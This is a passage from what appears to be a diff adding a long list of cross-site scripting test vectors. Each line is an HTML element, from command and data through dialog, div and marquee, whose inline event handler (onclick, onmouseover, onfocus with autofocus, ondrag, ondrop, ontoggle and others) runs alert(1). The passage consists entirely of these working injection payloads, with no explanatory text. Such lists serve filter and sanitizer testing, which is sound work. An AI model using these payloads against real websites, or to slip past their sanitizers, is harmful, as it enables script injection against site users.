onmousemove="alert(1)">test</command> +<command onmouseout="alert(1)">test</command> +<command onmouseover="alert(1)">test</command> +<command onmouseup="alert(1)">test</command> +<command onpaste="alert(1)" contenteditable>test</command> +<content draggable="true" ondrag="alert(1)">test</content> +<content draggable="true" ondragend="alert(1)">test</content> +<content draggable="true" ondragenter="alert(1)">test</content> +<content draggable="true" ondragleave="alert(1)">test</content> +<content draggable="true" ondragstart="alert(1)">test</content> +<content id=x tabindex=1 onactivate=alert(1)></content> +<content id=x tabindex=1 onbeforeactivate=alert(1)></content> +<content id=x tabindex=1 onbeforedeactivate=alert(1)></content><input autofocus> +<content id=x tabindex=1 ondeactivate=alert(1)></content><input id=y autofocus> +<content id=x tabindex=1 onfocus=alert(1)></content> 
+<content id=x tabindex=1 onfocusin=alert(1)></content> +<content onbeforecopy="alert(1)" contenteditable>test</content> +<content onbeforecut="alert(1)" contenteditable>test</content> +<content onbeforepaste="alert(1)" contenteditable>test</content> +<content onblur=alert(1) tabindex=1 id=x></content><input autofocus> +<content onclick="alert(1)">test</content> +<content oncontextmenu="alert(1)">test</content> +<content oncopy="alert(1)" contenteditable>test</content> +<content oncut="alert(1)" contenteditable>test</content> +<content ondblclick="alert(1)">test</content> +<content onfocusout=alert(1) tabindex=1 id=x></content><input autofocus> +<content onkeydown="alert(1)" contenteditable>test</content> +<content onkeypress="alert(1)" contenteditable>test</content> +<content onkeyup="alert(1)" contenteditable>test</content> +<content onmousedown="alert(1)">test</content> +<content onmouseenter="alert(1)">test</content> +<content onmouseleave="alert(1)">test</content> +<content onmousemove="alert(1)">test</content> +<content onmouseout="alert(1)">test</content> +<content onmouseover="alert(1)">test</content> +<content onmouseup="alert(1)">test</content> +<content onpaste="alert(1)" contenteditable>test</content> +<data draggable="true" ondrag="alert(1)">test</data> +<data draggable="true" ondragend="alert(1)">test</data> +<data draggable="true" ondragenter="alert(1)">test</data> +<data draggable="true" ondragleave="alert(1)">test</data> +<data draggable="true" ondragstart="alert(1)">test</data> +<data id=x tabindex=1 onactivate=alert(1)></data> +<data id=x tabindex=1 onbeforeactivate=alert(1)></data> +<data id=x tabindex=1 onbeforedeactivate=alert(1)></data><input autofocus> +<data id=x tabindex=1 ondeactivate=alert(1)></data><input id=y autofocus> +<data id=x tabindex=1 onfocus=alert(1)></data> +<data id=x tabindex=1 onfocusin=alert(1)></data> +<data onbeforecopy="alert(1)" contenteditable>test</data> +<data onbeforecut="alert(1)" contenteditable>test</data> 
+<data onbeforepaste="alert(1)" contenteditable>test</data> +<data onblur=alert(1) tabindex=1 id=x></data><input autofocus> +<data onclick="alert(1)">test</data> +<data oncontextmenu="alert(1)">test</data> +<data oncopy="alert(1)" contenteditable>test</data> +<data oncut="alert(1)" contenteditable>test</data> +<data ondblclick="alert(1)">test</data> +<data onfocusout=alert(1) tabindex=1 id=x></data><input autofocus> +<data onkeydown="alert(1)" contenteditable>test</data> +<data onkeypress="alert(1)" contenteditable>test</data> +<data onkeyup="alert(1)" contenteditable>test</data> +<data onmousedown="alert(1)">test</data> +<data onmouseenter="alert(1)">test</data> +<data onmouseleave="alert(1)">test</data> +<data onmousemove="alert(1)">test</data> +<data onmouseout="alert(1)">test</data> +<data onmouseover="alert(1)">test</data> +<data onmouseup="alert(1)">test</data> +<data onpaste="alert(1)" contenteditable>test</data> +<datalist draggable="true" ondrag="alert(1)">test</datalist> +<datalist draggable="true" ondragend="alert(1)">test</datalist> +<datalist draggable="true" ondragenter="alert(1)">test</datalist> +<datalist draggable="true" ondragleave="alert(1)">test</datalist> +<datalist draggable="true" ondragstart="alert(1)">test</datalist> +<datalist id=x tabindex=1 onactivate=alert(1)></datalist> +<datalist id=x tabindex=1 onbeforeactivate=alert(1)></datalist> +<datalist id=x tabindex=1 onbeforedeactivate=alert(1)></datalist><input autofocus> +<datalist id=x tabindex=1 ondeactivate=alert(1)></datalist><input id=y autofocus> +<datalist id=x tabindex=1 onfocus=alert(1)></datalist> +<datalist id=x tabindex=1 onfocusin=alert(1)></datalist> +<datalist onbeforecopy="alert(1)" contenteditable>test</datalist> +<datalist onbeforecut="alert(1)" contenteditable>test</datalist> +<datalist onbeforepaste="alert(1)" contenteditable>test</datalist> +<datalist onblur=alert(1) tabindex=1 id=x></datalist><input autofocus> +<datalist onclick="alert(1)">test</datalist> +<datalist 
oncontextmenu="alert(1)">test</datalist> +<datalist oncopy="alert(1)" contenteditable>test</datalist> +<datalist oncut="alert(1)" contenteditable>test</datalist> +<datalist ondblclick="alert(1)">test</datalist> +<datalist onfocusout=alert(1) tabindex=1 id=x></datalist><input autofocus> +<datalist onkeydown="alert(1)" contenteditable>test</datalist> +<datalist onkeypress="alert(1)" contenteditable>test</datalist> +<datalist onkeyup="alert(1)" contenteditable>test</datalist> +<datalist onmousedown="alert(1)">test</datalist> +<datalist onmouseenter="alert(1)">test</datalist> +<datalist onmouseleave="alert(1)">test</datalist> +<datalist onmousemove="alert(1)">test</datalist> +<datalist onmouseout="alert(1)">test</datalist> +<datalist onmouseover="alert(1)">test</datalist> +<datalist onmouseup="alert(1)">test</datalist> +<datalist onpaste="alert(1)" contenteditable>test</datalist> +<dd draggable="true" ondrag="alert(1)">test</dd> +<dd draggable="true" ondragend="alert(1)">test</dd> +<dd draggable="true" ondragenter="alert(1)">test</dd> +<dd draggable="true" ondragleave="alert(1)">test</dd> +<dd draggable="true" ondragstart="alert(1)">test</dd> +<dd id=x tabindex=1 onactivate=alert(1)></dd> +<dd id=x tabindex=1 onbeforeactivate=alert(1)></dd> +<dd id=x tabindex=1 onbeforedeactivate=alert(1)></dd><input autofocus> +<dd id=x tabindex=1 ondeactivate=alert(1)></dd><input id=y autofocus> +<dd id=x tabindex=1 onfocus=alert(1)></dd> +<dd id=x tabindex=1 onfocusin=alert(1)></dd> +<dd onbeforecopy="alert(1)" contenteditable>test</dd> +<dd onbeforecut="alert(1)" contenteditable>test</dd> +<dd onbeforepaste="alert(1)" contenteditable>test</dd> +<dd onblur=alert(1) tabindex=1 id=x></dd><input autofocus> +<dd onclick="alert(1)">test</dd> +<dd oncontextmenu="alert(1)">test</dd> +<dd oncopy="alert(1)" contenteditable>test</dd> +<dd oncut="alert(1)" contenteditable>test</dd> +<dd ondblclick="alert(1)">test</dd> +<dd onfocusout=alert(1) tabindex=1 id=x></dd><input autofocus> +<dd 
onkeydown="alert(1)" contenteditable>test</dd> +<dd onkeypress="alert(1)" contenteditable>test</dd> +<dd onkeyup="alert(1)" contenteditable>test</dd> +<dd onmousedown="alert(1)">test</dd> +<dd onmouseenter="alert(1)">test</dd> +<dd onmouseleave="alert(1)">test</dd> +<dd onmousemove="alert(1)">test</dd> +<dd onmouseout="alert(1)">test</dd> +<dd onmouseover="alert(1)">test</dd> +<dd onmouseup="alert(1)">test</dd> +<dd onpaste="alert(1)" contenteditable>test</dd> +<del draggable="true" ondrag="alert(1)">test</del> +<del draggable="true" ondragend="alert(1)">test</del> +<del draggable="true" ondragenter="alert(1)">test</del> +<del draggable="true" ondragleave="alert(1)">test</del> +<del draggable="true" ondragstart="alert(1)">test</del> +<del id=x tabindex=1 onactivate=alert(1)></del> +<del id=x tabindex=1 onbeforeactivate=alert(1)></del> +<del id=x tabindex=1 onbeforedeactivate=alert(1)></del><input autofocus> +<del id=x tabindex=1 ondeactivate=alert(1)></del><input id=y autofocus> +<del id=x tabindex=1 onfocus=alert(1)></del> +<del id=x tabindex=1 onfocusin=alert(1)></del> +<del onbeforecopy="alert(1)" contenteditable>test</del> +<del onbeforecut="alert(1)" contenteditable>test</del> +<del onbeforepaste="alert(1)" contenteditable>test</del> +<del onblur=alert(1) tabindex=1 id=x></del><input autofocus> +<del onclick="alert(1)">test</del> +<del oncontextmenu="alert(1)">test</del> +<del oncopy="alert(1)" contenteditable>test</del> +<del oncut="alert(1)" contenteditable>test</del> +<del ondblclick="alert(1)">test</del> +<del onfocusout=alert(1) tabindex=1 id=x></del><input autofocus> +<del onkeydown="alert(1)" contenteditable>test</del> +<del onkeypress="alert(1)" contenteditable>test</del> +<del onkeyup="alert(1)" contenteditable>test</del> +<del onmousedown="alert(1)">test</del> +<del onmouseenter="alert(1)">test</del> +<del onmouseleave="alert(1)">test</del> +<del onmousemove="alert(1)">test</del> +<del onmouseout="alert(1)">test</del> +<del 
onmouseover="alert(1)">test</del> +<del onmouseup="alert(1)">test</del> +<del onpaste="alert(1)" contenteditable>test</del> +<details draggable="true" ondrag="alert(1)">test</details> +<details draggable="true" ondragend="alert(1)">test</details> +<details draggable="true" ondragenter="alert(1)">test</details> +<details draggable="true" ondragleave="alert(1)">test</details> +<details draggable="true" ondragstart="alert(1)">test</details> +<details id=x tabindex=1 onactivate=alert(1)></details> +<details id=x tabindex=1 onbeforeactivate=alert(1)></details> +<details id=x tabindex=1 onbeforedeactivate=alert(1)></details><input autofocus> +<details id=x tabindex=1 ondeactivate=alert(1)></details><input id=y autofocus> +<details id=x tabindex=1 onfocus=alert(1)></details> +<details id=x tabindex=1 onfocusin=alert(1)></details> +<details onbeforecopy="alert(1)" contenteditable>test</details> +<details onbeforecut="alert(1)" contenteditable>test</details> +<details onbeforepaste="alert(1)" contenteditable>test</details> +<details onblur=alert(1) tabindex=1 id=x></details><input autofocus> +<details onclick="alert(1)">test</details> +<details oncontextmenu="alert(1)">test</details> +<details oncopy="alert(1)" contenteditable>test</details> +<details oncut="alert(1)" contenteditable>test</details> +<details ondblclick="alert(1)">test</details> +<details onfocusout=alert(1) tabindex=1 id=x></details><input autofocus> +<details onkeydown="alert(1)" contenteditable>test</details> +<details onkeypress="alert(1)" contenteditable>test</details> +<details onkeyup="alert(1)" contenteditable>test</details> +<details onmousedown="alert(1)">test</details> +<details onmouseenter="alert(1)">test</details> +<details onmouseleave="alert(1)">test</details> +<details onmousemove="alert(1)">test</details> +<details onmouseout="alert(1)">test</details> +<details onmouseover="alert(1)">test</details> +<details onmouseup="alert(1)">test</details> +<details onpaste="alert(1)" 
contenteditable>test</details> +<details ontoggle=alert(1) open>test</details> +<dfn draggable="true" ondrag="alert(1)">test</dfn> +<dfn draggable="true" ondragend="alert(1)">test</dfn> +<dfn draggable="true" ondragenter="alert(1)">test</dfn> +<dfn draggable="true" ondragleave="alert(1)">test</dfn> +<dfn draggable="true" ondragstart="alert(1)">test</dfn> +<dfn id=x tabindex=1 onactivate=alert(1)></dfn> +<dfn id=x tabindex=1 onbeforeactivate=alert(1)></dfn> +<dfn id=x tabindex=1 onbeforedeactivate=alert(1)></dfn><input autofocus> +<dfn id=x tabindex=1 ondeactivate=alert(1)></dfn><input id=y autofocus> +<dfn id=x tabindex=1 onfocus=alert(1)></dfn> +<dfn id=x tabindex=1 onfocusin=alert(1)></dfn> +<dfn onbeforecopy="alert(1)" contenteditable>test</dfn> +<dfn onbeforecut="alert(1)" contenteditable>test</dfn> +<dfn onbeforepaste="alert(1)" contenteditable>test</dfn> +<dfn onblur=alert(1) tabindex=1 id=x></dfn><input autofocus> +<dfn onclick="alert(1)">test</dfn> +<dfn oncontextmenu="alert(1)">test</dfn> +<dfn oncopy="alert(1)" contenteditable>test</dfn> +<dfn oncut="alert(1)" contenteditable>test</dfn> +<dfn ondblclick="alert(1)">test</dfn> +<dfn onfocusout=alert(1) tabindex=1 id=x></dfn><input autofocus> +<dfn onkeydown="alert(1)" contenteditable>test</dfn> +<dfn onkeypress="alert(1)" contenteditable>test</dfn> +<dfn onkeyup="alert(1)" contenteditable>test</dfn> +<dfn onmousedown="alert(1)">test</dfn> +<dfn onmouseenter="alert(1)">test</dfn> +<dfn onmouseleave="alert(1)">test</dfn> +<dfn onmousemove="alert(1)">test</dfn> +<dfn onmouseout="alert(1)">test</dfn> +<dfn onmouseover="alert(1)">test</dfn> +<dfn onmouseup="alert(1)">test</dfn> +<dfn onpaste="alert(1)" contenteditable>test</dfn> +<dialog draggable="true" ondrag="alert(1)">test</dialog> +<dialog draggable="true" ondragend="alert(1)">test</dialog> +<dialog draggable="true" ondragenter="alert(1)">test</dialog> +<dialog draggable="true" ondragleave="alert(1)">test</dialog> +<dialog draggable="true" 
ondragstart="alert(1)">test</dialog> +<dialog id=x tabindex=1 onactivate=alert(1)></dialog> +<dialog id=x tabindex=1 onbeforeactivate=alert(1)></dialog> +<dialog id=x tabindex=1 onbeforedeactivate=alert(1)></dialog><input autofocus> +<dialog id=x tabindex=1 ondeactivate=alert(1)></dialog><input id=y autofocus> +<dialog id=x tabindex=1 onfocus=alert(1)></dialog> +<dialog id=x tabindex=1 onfocusin=alert(1)></dialog> +<dialog onbeforecopy="alert(1)" contenteditable>test</dialog> +<dialog onbeforecut="alert(1)" contenteditable>test</dialog> +<dialog onbeforepaste="alert(1)" contenteditable>test</dialog> +<dialog onblur=alert(1) tabindex=1 id=x></dialog><input autofocus> +<dialog onclick="alert(1)">test</dialog> +<dialog oncontextmenu="alert(1)">test</dialog> +<dialog oncopy="alert(1)" contenteditable>test</dialog> +<dialog oncut="alert(1)" contenteditable>test</dialog> +<dialog ondblclick="alert(1)">test</dialog> +<dialog onfocusout=alert(1) tabindex=1 id=x></dialog><input autofocus> +<dialog onkeydown="alert(1)" contenteditable>test</dialog> +<dialog onkeypress="alert(1)" contenteditable>test</dialog> +<dialog onkeyup="alert(1)" contenteditable>test</dialog> +<dialog onmousedown="alert(1)">test</dialog> +<dialog onmouseenter="alert(1)">test</dialog> +<dialog onmouseleave="alert(1)">test</dialog> +<dialog onmousemove="alert(1)">test</dialog> +<dialog onmouseout="alert(1)">test</dialog> +<dialog onmouseover="alert(1)">test</dialog> +<dialog onmouseup="alert(1)">test</dialog> +<dialog onpaste="alert(1)" contenteditable>test</dialog> +<dir draggable="true" ondrag="alert(1)">test</dir> +<dir draggable="true" ondragend="alert(1)">test</dir> +<dir draggable="true" ondragenter="alert(1)">test</dir> +<dir draggable="true" ondragleave="alert(1)">test</dir> +<dir draggable="true" ondragstart="alert(1)">test</dir> +<dir id=x tabindex=1 onactivate=alert(1)></dir> +<dir id=x tabindex=1 onbeforeactivate=alert(1)></dir> +<dir id=x tabindex=1 onbeforedeactivate=alert(1)></dir><input 
autofocus> +<dir id=x tabindex=1 ondeactivate=alert(1)></dir><input id=y autofocus> +<dir id=x tabindex=1 onfocus=alert(1)></dir> +<dir id=x tabindex=1 onfocusin=alert(1)></dir> +<dir onbeforecopy="alert(1)" contenteditable>test</dir> +<dir onbeforecut="alert(1)" contenteditable>test</dir> +<dir onbeforepaste="alert(1)" contenteditable>test</dir> +<dir onblur=alert(1) tabindex=1 id=x></dir><input autofocus> +<dir onclick="alert(1)">test</dir> +<dir oncontextmenu="alert(1)">test</dir> +<dir oncopy="alert(1)" contenteditable>test</dir> +<dir oncut="alert(1)" contenteditable>test</dir> +<dir ondblclick="alert(1)">test</dir> +<dir onfocusout=alert(1) tabindex=1 id=x></dir><input autofocus> +<dir onkeydown="alert(1)" contenteditable>test</dir> +<dir onkeypress="alert(1)" contenteditable>test</dir> +<dir onkeyup="alert(1)" contenteditable>test</dir> +<dir onmousedown="alert(1)">test</dir> +<dir onmouseenter="alert(1)">test</dir> +<dir onmouseleave="alert(1)">test</dir> +<dir onmousemove="alert(1)">test</dir> +<dir onmouseout="alert(1)">test</dir> +<dir onmouseover="alert(1)">test</dir> +<dir onmouseup="alert(1)">test</dir> +<dir onpaste="alert(1)" contenteditable>test</dir> +<div draggable="true" contenteditable>drag me</div><a ondragover=alert(1) contenteditable>drop here</a> +<div draggable="true" contenteditable>drag me</div><a ondrop=alert(1) contenteditable>drop here</a> +<div draggable="true" contenteditable>drag me</div><abbr ondragover=alert(1) contenteditable>drop here</abbr> +<div draggable="true" contenteditable>drag me</div><abbr ondrop=alert(1) contenteditable>drop here</abbr> +<div draggable="true" contenteditable>drag me</div><acronym ondragover=alert(1) contenteditable>drop here</acronym> +<div draggable="true" contenteditable>drag me</div><acronym ondrop=alert(1) contenteditable>drop here</acronym> +<div draggable="true" contenteditable>drag me</div><address ondragover=alert(1) contenteditable>drop here</address> +<div draggable="true" 
contenteditable>drag me</div><address ondrop=alert(1) contenteditable>drop here</address> +<div draggable="true" contenteditable>drag me</div><applet ondragover=alert(1) contenteditable>drop here</applet> +<div draggable="true" contenteditable>drag me</div><applet ondrop=alert(1) contenteditable>drop here</applet> +<div draggable="true" contenteditable>drag me</div><area ondragover=alert(1) contenteditable>drop here</area> +<div draggable="true" contenteditable>drag me</div><area ondrop=alert(1) contenteditable>drop here</area> +<div draggable="true" contenteditable>drag me</div><article ondragover=alert(1) contenteditable>drop here</article> +<div draggable="true" contenteditable>drag me</div><article ondrop=alert(1) contenteditable>drop here</article> +<div draggable="true" contenteditable>drag me</div><aside ondragover=alert(1) contenteditable>drop here</aside> +<div draggable="true" contenteditable>drag me</div><aside ondrop=alert(1) contenteditable>drop here</aside> +<div draggable="true" contenteditable>drag me</div><audio ondragover=alert(1) contenteditable>drop here</audio> +<div draggable="true" contenteditable>drag me</div><audio ondrop=alert(1) contenteditable>drop here</audio> +<div draggable="true" contenteditable>drag me</div><b ondragover=alert(1) contenteditable>drop here</b> +<div draggable="true" contenteditable>drag me</div><b ondrop=alert(1) contenteditable>drop here</b> +<div draggable="true" contenteditable>drag me</div><base ondragover=alert(1) contenteditable>drop here</base> +<div draggable="true" contenteditable>drag me</div><base ondrop=alert(1) contenteditable>drop here</base> +<div draggable="true" contenteditable>drag me</div><basefont ondragover=alert(1) contenteditable>drop here</basefont> +<div draggable="true" contenteditable>drag me</div><basefont ondrop=alert(1) contenteditable>drop here</basefont> +<div draggable="true" contenteditable>drag me</div><bdi ondragover=alert(1) contenteditable>drop here</bdi> +<div draggable="true" 
contenteditable>drag me</div><bdi ondrop=alert(1) contenteditable>drop here</bdi> +<div draggable="true" contenteditable>drag me</div><bdo ondragover=alert(1) contenteditable>drop here</bdo> +<div draggable="true" contenteditable>drag me</div><bdo ondrop=alert(1) contenteditable>drop here</bdo> +<div draggable="true" contenteditable>drag me</div><bgsound ondragover=alert(1) contenteditable>drop here</bgsound> +<div draggable="true" contenteditable>drag me</div><bgsound ondrop=alert(1) contenteditable>drop here</bgsound> +<div draggable="true" contenteditable>drag me</div><big ondragover=alert(1) contenteditable>drop here</big> +<div draggable="true" contenteditable>drag me</div><big ondrop=alert(1) contenteditable>drop here</big> +<div draggable="true" contenteditable>drag me</div><blink ondragover=alert(1) contenteditable>drop here</blink> +<div draggable="true" contenteditable>drag me</div><blink ondrop=alert(1) contenteditable>drop here</blink> +<div draggable="true" contenteditable>drag me</div><blockquote ondragover=alert(1) contenteditable>drop here</blockquote> +<div draggable="true" contenteditable>drag me</div><blockquote ondrop=alert(1) contenteditable>drop here</blockquote> +<div draggable="true" contenteditable>drag me</div><body ondragover=alert(1) contenteditable>drop here</body> +<div draggable="true" contenteditable>drag me</div><body ondrop=alert(1) contenteditable>drop here</body> +<div draggable="true" contenteditable>drag me</div><br ondragover=alert(1) contenteditable>drop here</br> +<div draggable="true" contenteditable>drag me</div><br ondrop=alert(1) contenteditable>drop here</br> +<div draggable="true" contenteditable>drag me</div><button ondragover=alert(1) contenteditable>drop here</button> +<div draggable="true" contenteditable>drag me</div><button ondrop=alert(1) contenteditable>drop here</button> +<div draggable="true" contenteditable>drag me</div><canvas ondragover=alert(1) contenteditable>drop here</canvas> +<div draggable="true" 
contenteditable>drag me</div><canvas ondrop=alert(1) contenteditable>drop here</canvas> +<div draggable="true" contenteditable>drag me</div><caption ondragover=alert(1) contenteditable>drop here</caption> +<div draggable="true" contenteditable>drag me</div><caption ondrop=alert(1) contenteditable>drop here</caption> +<div draggable="true" contenteditable>drag me</div><center ondragover=alert(1) contenteditable>drop here</center> +<div draggable="true" contenteditable>drag me</div><center ondrop=alert(1) contenteditable>drop here</center> +<div draggable="true" contenteditable>drag me</div><cite ondragover=alert(1) contenteditable>drop here</cite> +<div draggable="true" contenteditable>drag me</div><cite ondrop=alert(1) contenteditable>drop here</cite> +<div draggable="true" contenteditable>drag me</div><code ondragover=alert(1) contenteditable>drop here</code> +<div draggable="true" contenteditable>drag me</div><code ondrop=alert(1) contenteditable>drop here</code> +<div draggable="true" contenteditable>drag me</div><col ondragover=alert(1) contenteditable>drop here</col> +<div draggable="true" contenteditable>drag me</div><col ondrop=alert(1) contenteditable>drop here</col> +<div draggable="true" contenteditable>drag me</div><colgroup ondragover=alert(1) contenteditable>drop here</colgroup> +<div draggable="true" contenteditable>drag me</div><colgroup ondrop=alert(1) contenteditable>drop here</colgroup> +<div draggable="true" contenteditable>drag me</div><command ondragover=alert(1) contenteditable>drop here</command> +<div draggable="true" contenteditable>drag me</div><command ondrop=alert(1) contenteditable>drop here</command> +<div draggable="true" contenteditable>drag me</div><content ondragover=alert(1) contenteditable>drop here</content> +<div draggable="true" contenteditable>drag me</div><content ondrop=alert(1) contenteditable>drop here</content> +<div draggable="true" contenteditable>drag me</div><data ondragover=alert(1) contenteditable>drop here</data> 
+<div draggable="true" contenteditable>drag me</div><data ondrop=alert(1) contenteditable>drop here</data> +<div draggable="true" contenteditable>drag me</div><datalist ondragover=alert(1) contenteditable>drop here</datalist> +<div draggable="true" contenteditable>drag me</div><datalist ondrop=alert(1) contenteditable>drop here</datalist> +<div draggable="true" contenteditable>drag me</div><dd ondragover=alert(1) contenteditable>drop here</dd> +<div draggable="true" contenteditable>drag me</div><dd ondrop=alert(1) contenteditable>drop here</dd> +<div draggable="true" contenteditable>drag me</div><del ondragover=alert(1) contenteditable>drop here</del> +<div draggable="true" contenteditable>drag me</div><del ondrop=alert(1) contenteditable>drop here</del> +<div draggable="true" contenteditable>drag me</div><details ondragover=alert(1) contenteditable>drop here</details> +<div draggable="true" contenteditable>drag me</div><details ondrop=alert(1) contenteditable>drop here</details> +<div draggable="true" contenteditable>drag me</div><dfn ondragover=alert(1) contenteditable>drop here</dfn> +<div draggable="true" contenteditable>drag me</div><dfn ondrop=alert(1) contenteditable>drop here</dfn> +<div draggable="true" contenteditable>drag me</div><dialog ondragover=alert(1) contenteditable>drop here</dialog> +<div draggable="true" contenteditable>drag me</div><dialog ondrop=alert(1) contenteditable>drop here</dialog> +<div draggable="true" contenteditable>drag me</div><dir ondragover=alert(1) contenteditable>drop here</dir> +<div draggable="true" contenteditable>drag me</div><dir ondrop=alert(1) contenteditable>drop here</dir> +<div draggable="true" contenteditable>drag me</div><div ondragover=alert(1) contenteditable>drop here</div> +<div draggable="true" contenteditable>drag me</div><div ondrop=alert(1) contenteditable>drop here</div> +<div draggable="true" contenteditable>drag me</div><dl ondragover=alert(1) contenteditable>drop here</dl> +<div draggable="true" 
contenteditable>drag me</div><dl ondrop=alert(1) contenteditable>drop here</dl> +<div draggable="true" contenteditable>drag me</div><dt ondragover=alert(1) contenteditable>drop here</dt> +<div draggable="true" contenteditable>drag me</div><dt ondrop=alert(1) contenteditable>drop here</dt> +<div draggable="true" contenteditable>drag me</div><element ondragover=alert(1) contenteditable>drop here</element> +<div draggable="true" contenteditable>drag me</div><element ondrop=alert(1) contenteditable>drop here</element> +<div draggable="true" contenteditable>drag me</div><em ondragover=alert(1) contenteditable>drop here</em> +<div draggable="true" contenteditable>drag me</div><em ondrop=alert(1) contenteditable>drop here</em> +<div draggable="true" contenteditable>drag me</div><embed ondragover=alert(1) contenteditable>drop here</embed> +<div draggable="true" contenteditable>drag me</div><embed ondrop=alert(1) contenteditable>drop here</embed> +<div draggable="true" contenteditable>drag me</div><fieldset ondragover=alert(1) contenteditable>drop here</fieldset> +<div draggable="true" contenteditable>drag me</div><fieldset ondrop=alert(1) contenteditable>drop here</fieldset> +<div draggable="true" contenteditable>drag me</div><figcaption ondragover=alert(1) contenteditable>drop here</figcaption> +<div draggable="true" contenteditable>drag me</div><figcaption ondrop=alert(1) contenteditable>drop here</figcaption> +<div draggable="true" contenteditable>drag me</div><figure ondragover=alert(1) contenteditable>drop here</figure> +<div draggable="true" contenteditable>drag me</div><figure ondrop=alert(1) contenteditable>drop here</figure> +<div draggable="true" contenteditable>drag me</div><font ondragover=alert(1) contenteditable>drop here</font> +<div draggable="true" contenteditable>drag me</div><font ondrop=alert(1) contenteditable>drop here</font> +<div draggable="true" contenteditable>drag me</div><footer ondragover=alert(1) contenteditable>drop here</footer> +<div 
draggable="true" contenteditable>drag me</div><footer ondrop=alert(1) contenteditable>drop here</footer> +<div draggable="true" contenteditable>drag me</div><form ondragover=alert(1) contenteditable>drop here</form> +<div draggable="true" contenteditable>drag me</div><form ondrop=alert(1) contenteditable>drop here</form> +<div draggable="true" contenteditable>drag me</div><frame ondragover=alert(1) contenteditable>drop here</frame> +<div draggable="true" contenteditable>drag me</div><frame ondrop=alert(1) contenteditable>drop here</frame> +<div draggable="true" contenteditable>drag me</div><frameset ondragover=alert(1) contenteditable>drop here</frameset> +<div draggable="true" contenteditable>drag me</div><frameset ondrop=alert(1) contenteditable>drop here</frameset> +<div draggable="true" contenteditable>drag me</div><h1 ondragover=alert(1) contenteditable>drop here</h1> +<div draggable="true" contenteditable>drag me</div><h1 ondrop=alert(1) contenteditable>drop here</h1> +<div draggable="true" contenteditable>drag me</div><head ondragover=alert(1) contenteditable>drop here</head> +<div draggable="true" contenteditable>drag me</div><head ondrop=alert(1) contenteditable>drop here</head> +<div draggable="true" contenteditable>drag me</div><header ondragover=alert(1) contenteditable>drop here</header> +<div draggable="true" contenteditable>drag me</div><header ondrop=alert(1) contenteditable>drop here</header> +<div draggable="true" contenteditable>drag me</div><hgroup ondragover=alert(1) contenteditable>drop here</hgroup> +<div draggable="true" contenteditable>drag me</div><hgroup ondrop=alert(1) contenteditable>drop here</hgroup> +<div draggable="true" contenteditable>drag me</div><hr ondragover=alert(1) contenteditable>drop here</hr> +<div draggable="true" contenteditable>drag me</div><hr ondrop=alert(1) contenteditable>drop here</hr> +<div draggable="true" contenteditable>drag me</div><html ondragover=alert(1) contenteditable>drop here</html> +<div 
draggable="true" contenteditable>drag me</div><html ondrop=alert(1) contenteditable>drop here</html> +<div draggable="true" contenteditable>drag me</div><i ondragover=alert(1) contenteditable>drop here</i> +<div draggable="true" contenteditable>drag me</div><i ondrop=alert(1) contenteditable>drop here</i> +<div draggable="true" contenteditable>drag me</div><iframe ondragover=alert(1) contenteditable>drop here</iframe> +<div draggable="true" contenteditable>drag me</div><iframe ondrop=alert(1) contenteditable>drop here</iframe> +<div draggable="true" contenteditable>drag me</div><image ondragover=alert(1) contenteditable>drop here</image> +<div draggable="true" contenteditable>drag me</div><image ondrop=alert(1) contenteditable>drop here</image> +<div draggable="true" contenteditable>drag me</div><img ondragover=alert(1) contenteditable>drop here</img> +<div draggable="true" contenteditable>drag me</div><img ondrop=alert(1) contenteditable>drop here</img> +<div draggable="true" contenteditable>drag me</div><input ondragover=alert(1) contenteditable>drop here</input> +<div draggable="true" contenteditable>drag me</div><input ondrop=alert(1) contenteditable>drop here</input> +<div draggable="true" contenteditable>drag me</div><ins ondragover=alert(1) contenteditable>drop here</ins> +<div draggable="true" contenteditable>drag me</div><ins ondrop=alert(1) contenteditable>drop here</ins> +<div draggable="true" contenteditable>drag me</div><isindex ondragover=alert(1) contenteditable>drop here</isindex> +<div draggable="true" contenteditable>drag me</div><isindex ondrop=alert(1) contenteditable>drop here</isindex> +<div draggable="true" contenteditable>drag me</div><kbd ondragover=alert(1) contenteditable>drop here</kbd> +<div draggable="true" contenteditable>drag me</div><kbd ondrop=alert(1) contenteditable>drop here</kbd> +<div draggable="true" contenteditable>drag me</div><keygen ondragover=alert(1) contenteditable>drop here</keygen> +<div draggable="true" 
contenteditable>drag me</div><keygen ondrop=alert(1) contenteditable>drop here</keygen> +<div draggable="true" contenteditable>drag me</div><label ondragover=alert(1) contenteditable>drop here</label> +<div draggable="true" contenteditable>drag me</div><label ondrop=alert(1) contenteditable>drop here</label> +<div draggable="true" contenteditable>drag me</div><legend ondragover=alert(1) contenteditable>drop here</legend> +<div draggable="true" contenteditable>drag me</div><legend ondrop=alert(1) contenteditable>drop here</legend> +<div draggable="true" contenteditable>drag me</div><li ondragover=alert(1) contenteditable>drop here</li> +<div draggable="true" contenteditable>drag me</div><li ondrop=alert(1) contenteditable>drop here</li> +<div draggable="true" contenteditable>drag me</div><link ondragover=alert(1) contenteditable>drop here</link> +<div draggable="true" contenteditable>drag me</div><link ondrop=alert(1) contenteditable>drop here</link> +<div draggable="true" contenteditable>drag me</div><listing ondragover=alert(1) contenteditable>drop here</listing> +<div draggable="true" contenteditable>drag me</div><listing ondrop=alert(1) contenteditable>drop here</listing> +<div draggable="true" contenteditable>drag me</div><main ondragover=alert(1) contenteditable>drop here</main> +<div draggable="true" contenteditable>drag me</div><main ondrop=alert(1) contenteditable>drop here</main> +<div draggable="true" contenteditable>drag me</div><map ondragover=alert(1) contenteditable>drop here</map> +<div draggable="true" contenteditable>drag me</div><map ondrop=alert(1) contenteditable>drop here</map> +<div draggable="true" contenteditable>drag me</div><mark ondragover=alert(1) contenteditable>drop here</mark> +<div draggable="true" contenteditable>drag me</div><mark ondrop=alert(1) contenteditable>drop here</mark> +<div draggable="true" contenteditable>drag me</div><marquee ondragover=alert(1) contenteditable>drop here</marquee> +<div draggable="true" 
